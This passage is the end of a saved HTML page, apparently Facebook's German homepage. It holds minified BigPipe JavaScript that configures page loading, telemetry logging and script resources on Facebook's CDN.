        nonce="A8B9F579">requireLazy(["__bigPipe"], (function (bigPipe) { bigPipe.onPageletArrive({ displayResources: ["Aviv5eE", "Pud6B2Z", "9psM9GY", "kfF6UzV", "rs+j/Ae", "OlAwqr9", "Rtwqv9J", "LfFe6kq", "d3dwM6j", "czsQTSm", "Yo2UzOh", "P/mr5VE"], id: "first_response", phase: 0, last_in_phase: true, tti_phase: 0, all_phases: [63], hsrp: { hblp: { consistency: { rev: 1005858897 } } }, allResources: ["Rtwqv9J", "Z2VqRsL", "QvOtGL6", "OlAwqr9", "d3dwM6j", "LfFe6kq", "czsQTSm", "Aviv5eE", "Pud6B2Z", "9psM9GY", "kfF6UzV", "rs+j/Ae", "Yo2UzOh", "lD85dlW", "P/mr5VE"] }); }));</script>
    <script>requireLazy(["__bigPipe"], function (bigPipe) { bigPipe.setPageID("7121366904243737342") });</script>
    <script
        nonce="A8B9F579">(function () { var n = now_inl(); requireLazy(["__bigPipe"], function (bigPipe) { bigPipe.beforePageletArrive("last_response", n); }) })();</script>
    <script
        nonce="A8B9F579">requireLazy(["__bigPipe"], (function (bigPipe) { bigPipe.onPageletArrive({ displayResources: ["d3dwM6j"], id: "last_response", phase: 63, last_in_phase: true, the_end: true, jsmods: { define: [["TimeSliceInteractionSV", [], { on_demand_reference_counting: true, on_demand_profiling_counters: true, default_rate: 1000, lite_default_rate: 100, interaction_to_lite_coinflip: { ADS_INTERFACES_INTERACTION: 0, ads_perf_scenario: 0, ads_wait_time: 0, Event: 1 }, interaction_to_coinflip: { ADS_INTERFACES_INTERACTION: 1, ads_perf_scenario: 1, ads_wait_time: 1, Event: 100 }, enable_heartbeat: true, maxBlockMergeDuration: 0, maxBlockMergeDistance: 0, enable_banzai_stream: true, user_timing_coinflip: 50, banzai_stream_coinflip: 0, compression_enabled: true, ref_counting_fix: false, ref_counting_cont_fix: false, also_record_new_timeslice_format: false, force_async_request_tracing_on: false }, 2609], ["cr:1642797", ["BanzaiBase"], { __rc: ["BanzaiBase", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:1069930", [], { __rc: [null, "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:1083116", ["XAsyncRequest"], { __rc: ["XAsyncRequest", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:1083117", [], { __rc: [null, "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["BanzaiConfig", [], { MAX_SIZE: 10000, MAX_WAIT: 150000, MIN_WAIT: null, RESTORE_WAIT: 150000, blacklist: ["time_spent"], disabled: false, gks: { boosted_pagelikes: true, mercury_send_error_logging: true, platform_oauth_client_events: true, graphexplorer: true, sticker_search_ranking: true }, known_routes: ["artillery_javascript_actions", "artillery_javascript_trace", "artillery_logger_data", "logger", "falco", "gk2_exposure", "js_error_logging", "loom_trace", "marauder", "perfx_custom_logger_endpoint", "qex", "require_cond_exposure_logging"], should_drop_unknown_routes: true, should_log_unknown_routes: false }, 7], ["cr:692209", ["cancelIdleCallbackBlue"], { __rc: ["cancelIdleCallbackBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["TrackingConfig", [], { domain: "https://pixel.facebook.com" }, 325], ["WebDevicePerfInfoData", [], { needsFullUpdate: true, needsPartialUpdate: false, shouldLogResourcePerf: false }, 3977], ["BrowserPaymentHandlerConfig", [], { enabled: false }, 3904], ["TimeSpentConfig", [], { "0_delay": 0, "0_timeout": 8, delay: 1000, timeout: 64 }, 142], ["cr:1353359", ["EventListenerImplForBlue"], { __rc: ["EventListenerImplForBlue", "Aa0PRntXaLjqMdCsxzq60mLLhd2o5StCLQRQQ8XgWhenw1d72_9uJh4IvSjYwfUqS_GB5kL91Pgan59tVEm4jHBljYWRFHyYxw"] }, -1], ["cr:844180", ["TimeSpentImmediateActiveSecondsLoggerBlue"], { __rc: ["TimeSpentImmediateActiveSecondsLoggerBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:1187159", ["BlueCompatBroker"], { __rc: ["BlueCompatBroker", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["cr:1634616", ["UserActivityBlue"], { __rc: ["UserActivityBlue", "Aa3WnjEaF4Wl-i2dhK0iqulhEEl1AGdVp6ORGwgliZjmK10WUvgOiX_OZ6L_x5P2XqEcfyfiu2Bw-m_x-eFOJroJi9c"] }, -1], ["ImmediateActiveSecondsConfig", [], { sampling_rate: 0 }, 423]], require: [["BDClientSignalCollectionTrigger", "startSignalCollection", [], [{ sc: "{\"t\":1637128278,\"c\":[[30000,838801],[30001,838801],[30002,838801],[30003,838801],[30004,838801],[30005,838801],[30006,573585],[30007,838801],[30008,838801],[30012,838801],[30013,838801],[30015,806033],[30018,806033],[30040,806033],[30093,806033],[30094,806033],[30095,806033],[30101,541591],[30102,541591],[30103,541591],[30104,541591],[30106,806039],[30107,806039],[38000,541427],[38001,806643]]}", fds: 60, fda: 60, i: 60, sbs: 1, dbs: 100, bbs: 100, hbi: 60, rt: 262144, hbcbc: 2, hbvbc: 0, hbbi: 30, sid: -1, hbv: "7624294500990730398" }]], ["NavigationMetrics", "setPage", [], [{ page: "XIndexReduxController", page_type: "normal", page_uri: "https://de-de.facebook.com/", serverLID: "7121366904243737342" }]], ["FalcoLoggerTransports", "attach", [], []], ["Chromedome", "start", [], [{}]], ["DimensionTracking"], ["ClickRefLogger"], ["DetectBrokenProxyCache", "run", [], [0, "c_user"]], ["NavigationClickPointHandler"], ["ServiceWorkerURLCleaner", "removeRedirectID", [], []], ["WebDevicePerfInfoLogging", "doLog", [], []], ["Artillery", "disable", [], []], ["ScriptPathLogger", "startLogging", [], []], ["TimeSpentBitArrayLogger", "init", [], []]] }, hsrp: { hsdp: { clpData: { "1743095": { r: 1, s: 1 }, "1871697": { r: 1, s: 1 }, "1829319": { r: 1 }, "1829320": { r: 1 }, "1843988": { r: 1 } }, gkxData: { "1652843": { result: false, hash: "AT6uh9NWRY4QEQoYbVU" }, "5541": { result: true, hash: "AT70V-Q_zfEykznOM2o" }, "1099893": { result: false, hash: "AT5kly2LSZV_DKGRpKw" } }, qexData: { "648": { r: null }, "650": { r: null }, "651": { r: null } } }, hblp: { consistency: { rev: 1005858897 }, rsrcMap: { B2ZbRV3: { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/9nmhULZMT4p.js?_nc_x=Ij3Wp8lg5Kz" }, zPYlTyl: { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz" }, tgmVVZO: { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3/y0/r/JVRu-BrVDXT.js?_nc_x=Ij3Wp8lg5Kz" }, "83Zjgc2": { type: "js", src: "https://static.xx.fbcdn.net/rsrc.php/v3i2UN4/yC/l/de_DE/WJP8bzQFY5_.js?_nc_x=Ij3Wp8lg5Kz" } }, compMap: { TransportSelectingClientSingleton: { r: ["aC8A+Rb", "nEGssXB"], rds: { m: ["ContextualConfig", "BladeRunnerClient", "DGWRequestStreamClient", "MqttLongPollingRunner", "BanzaiScuba_DEPRECATED"], r: ["B2ZbRV3", "d3dwM6j", "R1JMNBw", "wjeRNv7", "QvOtGL6", "9ln7HcE", "18dG1sp", "czsQTSm", "LfFe6kq", "yiyYHK7"] }, be: 1 }, RequestStreamCommonRequestStreamCommonTypes: { r: ["aC8A+Rb"], be: 1 } } } }, allResources: ["zPYlTyl", "tgmVVZO", "18dG1sp", "R1JMNBw", "czsQTSm", "83Zjgc2", "OlAwqr9", "yiyYHK7", "GpQFBwL", "Rtwqv9J", "LfFe6kq", "QvOtGL6", "d3dwM6j"] }); }));</script>
</body>

</html>